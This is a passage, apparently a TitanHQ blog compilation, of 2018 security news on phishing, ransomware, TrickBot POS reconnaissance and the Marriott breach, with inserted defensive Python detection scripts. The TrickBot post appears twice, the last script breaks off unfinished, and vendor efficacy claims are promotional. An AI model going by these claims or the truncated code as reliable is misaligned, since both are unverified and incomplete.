Homebuyers and Sellers Targeted by Solicitor Email Scam

Home purchasers and real estate agents in the United Kingdom and Ireland are being targeted by cybercriminals using a new solicitor email campaign. The scam, which involves impersonating a solicitor, is costing victims thousands. There have also been cases where cybercriminals contact solicitors by email claiming to be their clients and asking for changes to their bank details. Any pending transfers are then sent to the criminals’ accounts.

As funds for home purchases are sent to solicitors’ accounts before being shared with the sellers, if cybercriminals can amend the bank details for the transfers, the funds for the purchase will be paid straight into their bank accounts.

While email spoofing is not unusual, this solicitor email scam often involves hacking solicitors’ email accounts. Once access has been obtained, cybercriminals search for emails exchanged with buyers and sellers of homes to identify possible targets. In addition to the hacking of email accounts, there have been instances where emails between buyers, sellers and their solicitors have been intercepted. When bank details for a transfer are sent, the hackers replace the bank information in the email with their own and then forward the email on.

The solicitor email scam is sophisticated and communications are monitored until the crucial point in the purchasing process when a bank transfer is about to be completed. Since the possible rewards are considerable, cybercriminals are willing to invest the time and effort into the scam and be patient. Buyers, vendors and solicitors are well researched and the emails appear authentic.

This conveyancing scam has been on the rise in recent months and has now become the most common cybercrime impacting the legal sector. The Law Society, a representative organization for solicitors in the UK, has issued a warning about the conveyancing scam due to a rising number of complaints, although it is currently unclear how many fraudulent transfers have been completed.

The simple way to prevent such a scam from succeeding is to contact the homebuyer or seller before any transfer is made and to verbally confirm the bank details. Additionally, policies can be developed requiring bank account information to be sent only via postal mail.

The Solicitors Regulation Authority has issued guidance that advises against the use of email for property transactions due to the potential for cybercriminals to intercept and spoof messages. Email may be simple, but with such large sums being transferred it pays to use an abundance of caution.

While this solicitor email scam has been seen in many places across the UK and Ireland, legal firms in the United States should also use caution.

Ryuk Ransomware Suspected in Newspaper Cyberattack

The end of 2018 has seen a major newspaper cyberattack take place in the United States that has disrupted production of several newspapers published by Tribune Publishing.

The attacks were malware-based and affected the Saturday editions of the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, the New York Times, the Wall Street Journal, and a number of others. The malware attack took place on Thursday, December 27, and caused major issues throughout Friday.

All of the impacted newspapers shared the same production platform, which was infiltrated by the malware infection. While the sort of malware used in the attack has not been publicly confirmed, several insiders at the Tribune have reported that the attack utilized Ryuk ransomware.

Ransomware is a type of malware that encrypts critical files, preventing them from being accessed. The main goal of attackers is usually to obtain ransom payments in exchange for the keys to decrypt the encrypted files. It is also common for ransomware to be deployed after network access has been obtained and sensitive information has been stolen, either to mask a data breach or in an attempt to make an attack even more profitable. It is also not unknown for ransomware attacks to be carried out purely to cause disruption. It is thought that this newspaper cyberattack was conducted primarily to disable infrastructure.

The type of ransomware used in an attack is usually easy to identify. After encrypting files, ransomware changes file extensions to an (often) unique extension. In the case of Ryuk ransomware, extensions are changed to .ryk.

The Los Angeles Times has blamed threat actors based outside the United States, although it is not clear which group was behind the cyberattacks. If the attack was carried out to disable infrastructure, it is probable that this was a nation-state sponsored attack.

The first Ryuk ransomware cyberattacks took place in August. Three U.S. companies were attacked, and the attackers were paid a minimum of $640,000 for the keys to unlock the data. A review of the ransomware revealed it shared code with Hermes malware, which had previously been connected to the Lazarus Group, an APT group with links to North Korea.

While many ransomware campaigns use mass spamming tactics to spread the ransomware and infect as many end users as possible, the Ryuk ransomware attacks were much more targeted and involved major reconnaissance and extensive network mapping before the ransomware was finally deployed. As is the case with SamSam ransomware attacks, the campaign is carried out manually.

Several tactics are used to obtain access to networks, although earlier in 2018 a warning about Ryuk ransomware was issued by the U.S. Department of Health and Human Services (HHS) identifying email as one of the main attack vectors, emphasising the importance of email security and end user training to help staff recognize email-based threats.

Threat of Exposure with Multiple Malware Infections Combined in Recent Sextortion Scams

Sextortion scams have been very popular with cybercriminals during 2018. A well written email and an email list are all that is needed for this to be successful. The latter can easily be bought for almost nothing via darknet marketplaces and hacking forums. No expertise is required to run sextortion scams and, as scammers’ Bitcoin wallets show, they are successful.

Many sextortion scams threaten to reveal a user’s online activities (pornography habits, dating/adultery site usage) to all their contacts and friends/family unless a payment is made. Some of the recent sextortion scams have increased their credibility by claiming to have users’ passwords. However, new sextortion scams have been discovered in the past few days that are using a different tactic to get users to pay the ransom.

The email template used in this scam is very similar to those in other recent sextortion scams. The scammers say that they have a video of the victim viewing adult content. The footage was supposedly captured through the victim’s webcam and spliced with screenshots of the content that was being viewed.

In the new campaign the email includes the user’s email address in the body of the message, a password (most likely an old password obtained in a previous breach), and a hyperlink that the victim is encouraged to click to download the video that has supposedly been created and see what will soon be distributed via email and social media networks.

Visiting the link in the email will trigger the download of a zip file. The compressed file contains a document with the text of the email along with the supposed video file. That video file is really an information stealer: the Azorult Trojan.

This variant of the scam is even more likely to succeed than past campaigns. Many individuals who receive a sextortion scam email will know what it is: a mass email containing an empty threat. However, the inclusion of a link to download a video could lead many individuals to download the file to find out whether the threat is genuine.

If the zip file is downloaded and opened and the Azorult Trojan executed, it will quietly gather information from the user’s computer, similar to the information the hacker claims to have already obtained: cookies from websites the user has visited, chat histories, files stored on the computer, and login information entered through browsers, such as email account and bank details.

However, it doesn’t stop there. The Azorult Trojan will also install a secondary payload: GandCrab ransomware. Once information has been gathered, the user will have their personal files encrypted: documents, spreadsheets, digital photos, databases, music, videos, and more. Recovery will depend on those files having been backed up somewhere else and not also encrypted by the ransomware. Aside from permanent file loss, the only other option will be to pay a sizeable ransom to decrypt the encrypted files.

If the email was sent to a company email account, or to a personal email account that was accessed at work, files on the victim’s work computer will be encrypted. As a copy of the original email will remain on the device, the reason why the malware was downloaded will be made clear to the IT department.

The key to not being tricked is to ignore any threats sent by email and never click links in such emails nor open unexpected email attachments.

Companies can tackle the threat by using cybersecurity solutions such as spam filters and web filters. The former stops the emails from being delivered while the latter blocks access to sites that host malware.

FTC Warning Netflix After Phishing Scam

A new Netflix phishing scam has been discovered that tries to trick Netflix subscribers into disclosing their login details and other sensitive data such as Social Security numbers and bank account numbers.

This Netflix phishing scam is similar to others that have been seen over the past few months. A major campaign was discovered in October and another in November. The latest Netflix phishing scam confirms that the threat actors are now launching large-scale phishing attacks on a monthly basis.

The number of recent Netflix scams and the scale of the campaigns has led the U.S. Federal Trade Commission (FTC) to issue a warning to increase awareness of the threat.

The latest campaign was first noticed by an officer in the Ohio Police Department. As with past campaigns, the hackers use a tried and tested method to get users to click on the link in the email – the threat of account closure due to issues with the user’s billing details.

In order to stop closure of the user’s Netflix account, a link in the email must be clicked. That sends the user to what appears to be the Netflix site, where login details and banking information must be entered. While the web page looks authentic, it is hosted on a domain controlled by the hackers. Any information entered on that web page will be captured by the threat actors behind the scam.

The emails appear realistic, contain the correct logos and color schemes, and are almost identical to the official emails sent to users by Netflix. Netflix also includes links in its emails, so unwary users may click without first checking the authenticity of the email.

There are indications that the email is not what it seems. The email incorrectly begins “Hi Dear”; British English is used, even though the email is sent to U.S. citizens; the email is sent from a domain that is not used by Netflix; and the domain to which the email sends users is similarly suspect. However, the scam is sure to trick many users who fail to carefully review emails before taking any action.

Consumers need to use caution with email and should carefully review messages before responding, no matter how urgent the call to action is. It is a good idea to always visit a website directly by entering the domain into the address bar of a web browser, rather than clicking a link in an email.

If the email is found to be a scam, it should be reported to the appropriate authorities in the country in which you live and also to the company the scammers are pretending to be. In the case of Netflix phishing scams, emails should be sent to phishing@netflix.com.

While this Netflix phishing scam targets consumers, companies are also at risk. Many similar scams attempt to get users to part with business login credentials and bank account data. Businesses can reduce the risk of data and financial losses from phishing scams by making sure all members of the company, from the CEO down, receive regular security awareness training, are taught cybersecurity best practices, and are made aware of the most recent threats.

An advanced spam filtering solution is also strongly advisable to ensure the vast majority of these scam emails are blocked and do not reach inboxes. SpamTitan, for instance, stops more than 99.9% of spam and phishing emails and 100% of known malware.

For additional information on anti-phishing solutions for companies, get in touch with the TitanHQ team today.

Digimine Malware Transforms Infected Devices into Cryptocurrency Miners

Digimine malware is a new threat that was first discovered in a campaign in South Korea; however, attacks have now been witnessed worldwide.

Ransomware is still a popular tool that allows hackers to get a quick payout, but increased awareness of the threat means more companies are being more careful. Ransomware defenses have been improved and frequent backups are made to ensure files can be recovered without paying the ransom. Not only is it now much harder to infiltrate systems with ransomware, speedy detection means large-scale attacks on companies are stopped. It’s difficult to get a big payday, and the ability to restore files from backups means fewer companies are paying up.

The rise in popularity of cryptocurrency, and its rapid rise in value, have given cybercriminals another lucrative opportunity. Rather than distribute ransomware, they are developing and distributing cryptocurrency miners. By infecting a computer with a cryptocurrency miner, hackers do not need to rely on a victim paying a ransom.

Instead of locking devices and encrypting files, malware is downloaded that starts mining (creating) the cryptocurrency Monero, an alternative to Bitcoin. Mining cryptocurrency is the verification of cryptocurrency transactions for digital exchanges, which involves using computers to solve complex numeric problems. For verifying transactions, cryptocurrency miners earn coins, but cryptocurrency mining requires a great deal of processing power. To make it profitable, it must be carried out on an industrial scale.

The processing power of hundreds of thousands of devices would make the operation highly profitable for hackers, a fact that has certainly not been lost on the developers of Digimine malware.

Infection with Digimine malware will slow the victim’s device, as its processing power is used up mining Monero. However, that is not all. The campaign distributing this malware variant works via Facebook Messenger, and infection can see the victim’s contacts targeted and could potentially lead to the victim’s Facebook account being hijacked.

The Digimine malware campaign is being distributed using the desktop version of Facebook Messenger, through Google Chrome rather than the mobile app. Once a device is infected, if the victim’s Facebook account is set to log in automatically, the malware will send links to the victim’s contacts. Clicking those links will lead to installation of the malware, the generation of more messages to contacts and more infections, building up an army of hijacked devices for mining Monero.

Infections were first discovered in South Korea; however, they have now spread throughout east and south-east Asia, and beyond to Vietnam, Thailand, the Philippines, Azerbaijan, Ukraine, and Venezuela, according to Trend Micro.

A similar campaign has also been noticed by FortiGuard Labs. That campaign is being carried out by the actors behind the ransomware VenusLocker, who have similarly switched to Monero mining malware. That campaign also began in South Korea and is spreading rapidly. Rather than employ Facebook Messenger, the VenusLocker gang is using phishing emails.

Phishing emails for this campaign contain malicious email attachments that install the miner. One of the emails claims the victim’s details have been accidentally exposed in a data breach, with the attachment supposedly containing details of the attack and instructions to follow to address the risk.

These attacks seem to mark a new trend, and as ransomware defenses continue to improve it is likely that even more gangs will change tactics and switch to cryptocurrency mining.

Gift Card Scams Warning Issued for Holiday Season

Giving gift vouchers as Christmas presents is always popular and this year is no exception. Many gift card-themed scams were detected over Thanksgiving weekend that offered free or cheap gift cards to lure online shoppers into parting with their credit card details.

2018 has seen a surge in business email compromise (BEC) style tactics, with emails appearing to have been sent from within a company. The emails purport to have been sent by the CEO (or another executive) asking accounts and administration staff to purchase gift cards for clients, or requesting that gift cards be purchased for use as charitable donations.

To minimize the risk from gift card scams and other holiday-themed phishing emails, companies must ensure they have strong spam filtering technology in place to block the emails at source and prevent them from landing in inboxes.

Consumers can be tricked into parting with credit card details, but businesses too are in danger. Most of these campaigns are carried out in order to gain access to login credentials or are used to install malware. If an end user responds to such a scam while at work, it is their employer that will be hit with the cost of being hacked.

2018 has seen many businesses targeted with gift card scams. The latest reports from Proofpoint suggest that of the organizations that have been targeted with email fraud attacks, almost 16% had witnessed a gift card-themed attack, up from 11% in Q2 2018.

Many businesses use Office 365, but even Microsoft’s anti-phishing security has allowed phishing emails to slip through the net, especially at businesses that have not paid extra for advanced phishing protection. Even with the advanced anti-phishing security measures, emails still make it past Microsoft’s filters.

To obstruct these malicious messages, an advanced third-party spam filter is necessary.

Office 365 Phishing Emails Look Like Non-Delivery Alerts

A new phishing campaign was discovered by ISC Handler Xavier Mertens, and the campaign appears to still be active.

The phishing emails closely resemble legitimate Office 365 non-delivery alerts and include Office 365 branding. As is the case with official non-delivery alerts, the user is warned that messages have not been delivered and told that action is required.

The Office 365 phishing emails state that “Microsoft found Several Undelivered Messages” and attribute the non-delivery to “Server Congestion.” The emails ask the user to retype the recipient’s email address and send the message again, but conveniently include a Send Again button.

If users click the Send Again button, they are sent to a website that closely resembles the official Office 365 website and includes a login box that has been auto-populated with the user’s email address.

If the password is typed, a JavaScript function sends both the email address and password to the hacker. The user will then be sent to the genuine outlook.office365.com website where they will be shown a real Office 365 login box.

While the Office 365 phishing emails and the website look genuine, there are signs that all is not what it seems. The emails are well composed and the sender’s address – postmaster@us.ibm.com – looks official, but the warning message uses irregular capitalization, something that would not happen in an official Microsoft notification.

The clearest indication that this is a phishing scam is the domain to which users are sent if they click on the Send Again button. It is not an official Microsoft domain (agilones.com).

While the mistake in the email may be overlooked, users should notice the domain, although some users may proceed and type passwords as the login box is identical to the login on the official Microsoft site.

The campaign shows just how vital it is to carefully check every message before taking any action and to always review the domain before disclosing any sensitive data.
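The indicators listed in this post and in the Netflix phishing post above (sender domain not belonging to the brand, link domain not belonging to the brand, an impersonal greeting such as “Hi Dear”, British spelling aimed at U.S. recipients, and irregular capitalization) can be turned into a simple triage check. The following Python script is an added example written for this page, not code from TitanHQ or from the researchers cited; the three email messages, the brand domain sets and the British-spelling list are constructed for the example, and the capitalization test is a deliberately crude heuristic that will produce false positives on real mail.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
GENERIC_GREETINGS = ("hi dear", "hello dear", "dear customer", "dear user", "dear member")
# Small illustrative list of British spellings; extend for real use.
BRITISH_SPELLINGS = ("authorise", "centre", "colour", "favourite", "organisation", "recognise")

# Domains the checker treats as legitimately belonging to each brand (assumed for this example).
NETFLIX_DOMAINS = {"netflix.com"}
MICROSOFT_DOMAINS = {"microsoft.com", "office.com", "office365.com", "outlook.com", "microsoftonline.com"}

# Constructed sample messages (not real captures).
SAMPLE_NETFLIX_SCAM = (
    "From: Netflix Support <billing@netflix-account-verify.example>\n"
    "To: user@example.com\n"
    "Subject: Your account will be cancelled\n"
    "\n"
    "Hi Dear,\n"
    "We could not authorise your payment. Please update your billing centre details here:\n"
    "https://netflix-account-verify.example/login\n"
)
SAMPLE_OFFICE365_SCAM = (
    "From: Microsoft Outlook <postmaster@mail.example.net>\n"
    "To: user@example.com\n"
    "Subject: Undelivered messages\n"
    "\n"
    "Microsoft found Several Undelivered Messages due to Server Congestion.\n"
    "Retype the recipient address or use the button below to send again.\n"
    "https://login.example.net/office365/signin?u=user@example.com\n"
)
SAMPLE_LEGITIMATE = (
    "From: Netflix <info@netflix.com>\n"
    "To: user@example.com\n"
    "Subject: Your monthly receipt\n"
    "\n"
    "Hi Alice,\n"
    "Your receipt for this month is ready. View it at https://www.netflix.com/account\n"
)


def _is_brand_host(host, brand_domains):
    """True when host is one of the brand domains or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in brand_domains)


def _plain_text_body(msg):
    """Return the text/plain body of a parsed message (single-part or multipart)."""
    if not msg.is_multipart():
        return msg.get_payload()
    parts = [p.get_payload(decode=True).decode("utf-8", "replace")
             for p in msg.walk() if p.get_content_type() == "text/plain"]
    return "\n".join(parts)


def phishing_indicators(raw_email, brand_domains):
    """Return the indicator names found in raw_email, which claims to come from brand_domains."""
    msg = message_from_string(raw_email)
    brand_domains = {d.lower() for d in brand_domains}
    findings = []

    # 1. The sender's domain is not one the brand uses.
    _, sender = parseaddr(msg.get("From", ""))
    if not _is_brand_host(sender.rpartition("@")[2], brand_domains):
        findings.append("sender-domain-mismatch")

    body = _plain_text_body(msg)

    # 2. At least one link points outside the brand's domains.
    for url in URL_RE.findall(body):
        if not _is_brand_host(urlparse(url).hostname, brand_domains):
            findings.append("link-domain-mismatch")
            break

    text = URL_RE.sub(" ", body)  # strip URLs before the wording checks
    lowered = text.lower()

    # 3. Impersonal greeting such as "Hi Dear".
    if any(lowered.lstrip().startswith(g) for g in GENERIC_GREETINGS):
        findings.append("generic-greeting")

    # 4. British spelling in mail sent to a U.S. audience.
    if any(re.search(r"\b%s\b" % w, lowered) for w in BRITISH_SPELLINGS):
        findings.append("british-spelling")

    # 5. A capitalised word mid-sentence that is not the brand name ("found Several").
    brand_words = {d.split(".")[0] for d in brand_domains}
    for m in re.finditer(r"\b[a-z]+\s+([A-Z][a-z]+)\b", text):
        if m.group(1).lower() not in brand_words:
            findings.append("irregular-capitalization")
            break

    return findings


if __name__ == "__main__":
    for name, raw, brands in (("netflix scam", SAMPLE_NETFLIX_SCAM, NETFLIX_DOMAINS),
                              ("office365 scam", SAMPLE_OFFICE365_SCAM, MICROSOFT_DOMAINS),
                              ("legitimate", SAMPLE_LEGITIMATE, NETFLIX_DOMAINS)):
        print(name, "->", phishing_indicators(raw, brands) or "no indicators")
```

The domain checks carry most of the weight: a message can pass every wording test and still be a phish, but a login link that resolves to a host outside the brand’s domains is the signal the two posts single out, and it is the one a reader can verify before typing a password.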

Hackers use Office 365 phishing emails because so many companies have signed up to use Office 365. Mass email campaigns therefore have a high chance of reaching an Outlook inbox. That said, it is easy to target Office 365 users specifically: a business that uses Office 365 broadcasts that fact through its public DNS MX records.

Firms can improve their resilience to phishing attacks through mandatory security awareness training for all workers. Employees should be told to always review messages carefully and should be guided how to identify phishing emails.

Companies should also ensure they have an advanced spam filtering solution in place. While Microsoft does offer anti-phishing protection for Office 365 through its Advanced Threat Protection (ATP) offering, companies should consider using a third-party spam filtering solution with Office 365.

SpamTitan supplies superior protection against phishing and zero-day attacks, an area where ATP is not proficient.

500 Million Guests Impacted in Marriott Hotels Data Breach

A Marriott Hotels data breach has been discovered which could impact up to 500 million customers who previously made bookings at Starwood Hotels and Resorts. While the data breach is not the biggest ever reported – the 2013 Yahoo breach exposed up to 3 billion records – it is tied for second largest with the 2014 Yahoo data breach, which also impacted around half a billion users.

The Marriott data breach may not have impacted as many Internet users as the 2013 Yahoo data breach, but due to the range of information stolen it is arguably more serious. Almost 173 million individuals have had their name, mailing address and email address stolen, and around 327 million customers have had a combination of their name, address, phone number, email address, date of birth, gender, passport number, booking data, arrival and departure dates, and Starwood Guest Program (SPG) account numbers illegally taken. Additionally, Marriott also believes credit card details may have been illegally taken. While the credit card numbers were encrypted, Marriott cannot confirm whether the two pieces of data required to decrypt the credit card numbers were also taken by the hacker.

In addition to past guests at Starwood Hotels and Resorts and Starwood-branded timeshare properties, guests at Sheraton Hotels & Resorts, Westin Hotels & Resorts, W Hotels, St. Regis, Aloft Hotels, Element Hotels, The Luxury Collection, Tribute Portfolio, Le Méridien Hotels & Resorts, and Four Points by Sheraton have been affected, along with guests at Design Hotels that registered for the SPG program.

The data breach was discovered by Marriott on September 8, 2018, following an attempt by an unauthorized person to access the Starwood database. The investigation showed that the cybercriminal behind the attack first gained access to the Starwood database in 2014. It is currently not public knowledge how access to the database was obtained.

The Marriott hotels data breach is extremely serious and will prove massively expensive for the hotel group. Marriott has already offered U.S. based victims free enrollment in WebWatcher, has paid for third party experts to review and help address the data breach, and the hotel group will be strengthening its security and phasing out Starwood databases.

Even though the Marriott hotels data breach has only just been made public, two class action lawsuits have already been filed. One of the lawsuits seeks damages totaling $12.5 billion – $25 per person impacted.

There is also the possibility of an E.U. General Data Protection Regulation (GDPR) fine. Fines of up to €20 million can be imposed, or 4% of global annual revenue, whichever is greater. That could place Marriott at risk of a $916 million (€807 million) penalty. The UK’s Information Commissioner’s Office – the GDPR supervisory authority in the UK – has been made aware of the breach and is making enquiries.

Danger of Marriott Data Breach Related Phishing Attacks

Breach notification emails have been sent by Marriott to those impacted by the breach. They were sent from the domain email-marriott.com. Rendition Infosec/FireEye researchers bought the domains email-marriot.com and email.mariott.com just after the announcement to keep them out of the hands of hackers. Other similar domains may be bought by less scrupulous individuals to be used for phishing attacks.

A breach of this extent is also ideal for speculative phishing attempts that spoof the email domain owned by Marriott. Mass email campaigns are likely to be sent indiscriminately in the hope that they will reach breach victims or individuals who have previously stayed at a Marriott hotel or one of its associated brands.

TrickBot Malware Updated with POS Data Stealing Capabilities

A never before seen module has been added to TrickBot malware that implements point-of-sale (POS) data collection functionality.

TrickBot is a modular malware that is being actively developed. In early November, TrickBot was updated with a password stealing capability, but the most recent update has made it even more dangerous, especially for hotels, retail outlets, and restaurants: businesses that process large volumes of card payments.

The new module was discovered by security experts at Trend Micro who note that, at present, the module is not being deployed to record POS data such as credit/debit card details. At present, the new TrickBot malware module is only gathering data about whether an infected device is part of a network that supports POS services and the types of POS systems in use. The experts have not yet discovered how the POS information will be used, but it is highly probable that the module is being used for reconnaissance. Once targets with networks supporting POS systems have been selected, they will likely be subjected to further intrusions.

The new module, named psfin32, is similar to a previous network domain harvesting module, but has been developed specifically to identify POS-related terms from domain controllers and basic accounts. The module achieves this by issuing LDAP queries to Active Directory that search for dnsHostName values containing strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term.’
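Because the module’s reconnaissance consists of wildcard dnsHostName searches for a short list of substrings, a defender who logs LDAP queries on domain controllers can look for exactly that pattern: one client issuing several distinct wildcard searches for POS-related terms in quick succession. The Python script below is an added example written for this page, not Trend Micro’s or TrickBot’s code; the log line format (timestamp, client, user, search base, filter) is a simplified, constructed format rather than the layout of any real Windows event, and the sample lines are constructed. The term list is the one quoted above.

```python
import re
from collections import defaultdict

# POS-related substrings the psfin32 module searches for in dnsHostName (from the page).
POS_TERMS = frozenset(("pos", "retail", "store", "micros", "cash", "reg", "aloha", "lane", "boh", "term"))

# Simplified, constructed audit-line layout (assumed for this example, not a real event format).
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+client=(?P<client>\S+)\s+user=(?P<user>\S+)\s+"
    r"base=(?P<base>\S+)\s+filter=(?P<filter>.+)$"
)
# One (dnsHostName=value) clause inside an LDAP filter; the value may contain wildcards.
HOSTNAME_CLAUSE_RE = re.compile(r"\(dnsHostName=([^)]*)\)", re.IGNORECASE)

# Constructed sample log: one client sweeping POS terms, two doing ordinary lookups.
SAMPLE_LDAP_LOG = [
    "2018-12-03T09:14:02Z client=10.20.5.17 user=CORP\\jdoe base=DC=corp,DC=example filter=(dnsHostName=*pos*)",
    "2018-12-03T09:14:03Z client=10.20.5.17 user=CORP\\jdoe base=DC=corp,DC=example filter=(dnsHostName=*retail*)",
    "2018-12-03T09:14:03Z client=10.20.5.17 user=CORP\\jdoe base=DC=corp,DC=example "
    "filter=(|(dnsHostName=*store*)(dnsHostName=*micros*))",
    "2018-12-03T09:20:41Z client=10.20.7.2 user=CORP\\svc-inventory base=DC=corp,DC=example "
    "filter=(&(objectClass=computer)(dnsHostName=*))",
    "2018-12-03T09:21:10Z client=10.20.7.9 user=CORP\\helpdesk base=DC=corp,DC=example "
    "filter=(dnsHostName=reg-srv01.corp.example)",
    "2018-12-03T09:22:00Z client=10.20.7.9 user=CORP\\helpdesk base=DC=corp,DC=example filter=(dnsHostName=*lane*)",
]


def pos_terms_in_filter(ldap_filter):
    """Return the POS terms that an LDAP filter searches for via wildcard dnsHostName clauses.

    Exact-name lookups (no wildcard) and full enumerations (dnsHostName=*) are ignored:
    both are routine administrative or inventory activity.
    """
    hits = []
    for value in HOSTNAME_CLAUSE_RE.findall(ldap_filter):
        if "*" not in value:
            continue
        core = value.strip("*").lower()
        if core in POS_TERMS:
            hits.append(core)
    return hits


def analyze_ldap_log(lines, threshold=3):
    """Group POS-term searches by client and return clients at or above the threshold.

    The result maps client address -> sorted list of distinct POS terms it searched for.
    A single term (e.g. one 'lane' lookup) is not enough; the module sweeps the whole list.
    """
    per_client = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line, skip rather than crash the sweep
        for term in pos_terms_in_filter(m.group("filter")):
            per_client[m.group("client")].add(term)
    return {client: sorted(terms) for client, terms in per_client.items() if len(terms) >= threshold}


if __name__ == "__main__":
    for client, terms in analyze_ldap_log(SAMPLE_LDAP_LOG).items():
        print(f"possible POS reconnaissance from {client}: searched dnsHostName for {', '.join(terms)}")
```

The threshold is what keeps the check useful: a help desk analyst searching for `*lane*` once is noise, whereas one host querying for `pos`, `retail`, `store` and `micros` within seconds matches the behaviour the post describes and is worth an alert on its own, before any card data has been touched.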

The timing of the update, so near to the holiday period, implies that the threat actors are planning to take advantage of the busy holiday trade and are gathering as much information as possible before the module is used to collect POS data.

The recent updates to TrickBot malware have come along with a malicious spam email campaign (identified by Brad Duncan) which is focusing on companies in the United States. The malspam campaign uses Word documents containing malicious macros that install the TrickBot binary.

Defending against TrickBot and other data stealing malware requires a defense-in-depth approach to cybersecurity. The main attack vector threat actors use to deliver TrickBot is spam email, so it is essential for an advanced anti-spam solution to be deployed to stop malicious messages from being delivered to end users’ inboxes. End user training is also important to ensure employees are made aware of the danger of opening emails from unknown senders, launching suspicious email attachments, and visiting hyperlinks in those messages.

Antivirus solutions and endpoint security measures should also be used to identify and quarantine potentially malicious files in case malware does make it onto the network.

How to Strengthen the Office 365 Spam Filter

Office 365 has many advantages over competing software, so it is no surprise that it is proving so popular with businesses, but one common complaint is the number of spam and malicious emails that get through Microsoft’s defenses. If you have an issue with spam and phishing emails, there is an easy way to enhance the Office 365 spam filter.

Office 365 Email Security

Over 135 million commercial users are now on Office 365. Unfortunately, the popularity of Office 365 has made it a focus for hackers. Microsoft has been proactively implementing measures to improve the Office 365 spam filter to make it more effective at blocking spam and phishing attempts. Office 365 phishing protections have been enhanced and more malicious emails are now being blocked; however, even with the recent anti-phishing enhancements, many businesses still have to deal with spam, phishing emails, and other dangerous messages.

Companies using Office 365 as a hosted email solution are likely to have their email filtered by Exchange Online Protection (EOP). EOP does provide a good level of protection and blocks spam, phishing emails, and malware. Osterman Research stated that EOP blocks 100% of known malware and 99% of spam email but struggles with the last 1%. Many companies have found that EOP blocks basic phishing attacks but comes up short at blocking more sophisticated email threats such as spear phishing and advanced persistent threats.

To strengthen the Office 365 spam filter, you should upgrade to Advanced Threat Protection, the second level of security offered with Office 365. The level of security is much better, although Advanced Threat Protection cannot identify zero-day threats and falls short of many third-party solutions at preventing other advanced threats. An SE Labs study in the summer of 2017 found that even with the extra level of protection, which is only available in the Office 365 E5 license tier, protection only ranked in the low-middle of the market.

The number of cases of hackers targeting vulnerabilities in Office 365, and the volume of direct attacks on Office 365 users, has led a rising number of businesses to look for a way to improve the Office 365 spam filter further.

Companies that want to further strengthen the Office 365 spam filter (and those looking for an Office 365 Advanced Threat Protection alternative) need to think about implementing a third-party anti-spam solution.

Luckily, there is a solution that will not only enhance Office 365 spam filtering, it is quick and easy to put in place, needs no software installations, and no hardware purchases are required. In fact, it can be implemented, configured, and be up and running quickly.

SpamTitan is a strong cloud-based email security solution that has been created to provide superior security against spam, phishing, malware, zero-day attacks, and data loss through email.

Unlike Office 365, SpamTitan uses predictive measures such as Bayesian analysis, machine learning, and heuristics to block zero-day attacks, advanced persistent threats, new malware variants, and new spear phishing methods.

SpamTitan reviews email headers, analyzes domains, and scans email content to spot phishing threats. Embedded hyperlinks, including shortened URLs, are reviewed in real time and subjected to multiple URL reputation checks, while dual antivirus engines scan for and block 100% of known malware.

SpamTitan also uses data loss prevention tools for emails and attachments, which are not available with EOP. Users can establish tags for keywords and data elements such as Social Security numbers to secure against theft by insiders. SpamTitan also acts as a backup for your mail server to ensure business continuity.

With SpamTitan you get a higher level of security from spam and malicious emails, a higher spam catch rate (over 99.9%), improved granularity, better control over outbound email, and better business continuity protections.

If you have switched to Office 365 yet are still having issues with spam, phishing, and other malicious emails, or if you are an MSP that wants to offer clients enhanced Office 365 email security, get in touch with the TitanHQ team today.

The TitanHQ team can schedule a product demonstration and assist you in putting SpamTitan through its paces in your own environment in a no-obligation free trial.

POS Data Stealing Capabilities Added to TrickBot Malware

A new module has been added to TrickBot malware that gives it point-of-sale (POS) data collection capabilities.

TrickBot is a modular malware that is under active development. In early November, TrickBot was updated with a password stealing module, but the latest update has made it even more dangerous, mostly for hotels, retail outlets, and restaurants: companies that process large volumes of card payments.

The new module was discovered by security experts at Trend Micro who note that, at present, the module is not being used to capture POS data such as credit/debit card numbers. Currently, the new TrickBot malware module is only gathering data about whether an infected device is part of a network that supports POS services and the types of POS systems implemented. The experts have not yet determined how the POS information will be used, but it is highly likely that the module is being used for intelligence. Once targets with networks supporting POS systems have been discovered, they will likely be subjected to further intrusions.

The new module, labelled psfin32, is similar to a previous network domain harvesting module, but has been developed specifically to spot POS-related terms on domain controllers and basic accounts. The module achieves this by using LDAP queries to Active Directory Services that search for a dnsHostName that includes strings such as ‘pos’, ‘retail’, ‘store’, ‘micros’, ‘cash’, ‘reg’, ‘aloha’, ‘lane’, ‘boh’, and ‘term’.
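Because the reconnaissance described above is a sweep of dnsHostName substring queries, a defender can look for the same pattern in directory query logs. The following is an added detection example, not TrickBot's code and not part of the original article; the log line layout and the client addresses are constructed for the example.

```python
"""Flag LDAP searches that resemble TrickBot's psfin32 POS reconnaissance.

Added example, not part of the original article. It scans LDAP query log lines
for dnsHostName filters that probe for the POS-related substrings named in the
write-up and reports any client that probes several of them. The log format
("<timestamp> client=<ip> filter=<ldap filter>") is constructed; adapt LINE to
your directory server's query log.
"""
import re
from collections import defaultdict

# Substrings the article reports psfin32 searching for in dnsHostName values.
POS_TERMS = {"pos", "retail", "store", "micros", "cash", "reg", "aloha",
             "lane", "boh", "term"}

# An LDAP assertion on dnsHostName, e.g. (dnsHostName=*pos*); attribute names
# are case-insensitive in LDAP, so match them that way.
DNSHOST_ASSERTION = re.compile(r"\(dnsHostName=([^)]*)\)", re.IGNORECASE)

# Constructed sample log lines for this example.
SAMPLE_LOG = """\
2018-12-03T10:01:02 client=10.0.0.5 filter=(&(objectCategory=computer)(dnsHostName=*pos*))
2018-12-03T10:01:03 client=10.0.0.5 filter=(&(objectCategory=computer)(dnsHostName=*retail*))
2018-12-03T10:01:03 client=10.0.0.5 filter=(&(objectCategory=computer)(dnsHostName=*aloha*))
2018-12-03T10:01:04 client=10.0.0.5 filter=(&(objectCategory=computer)(dnsHostName=*boh*))
2018-12-03T10:05:10 client=10.0.0.9 filter=(&(objectClass=user)(sAMAccountName=jsmith))
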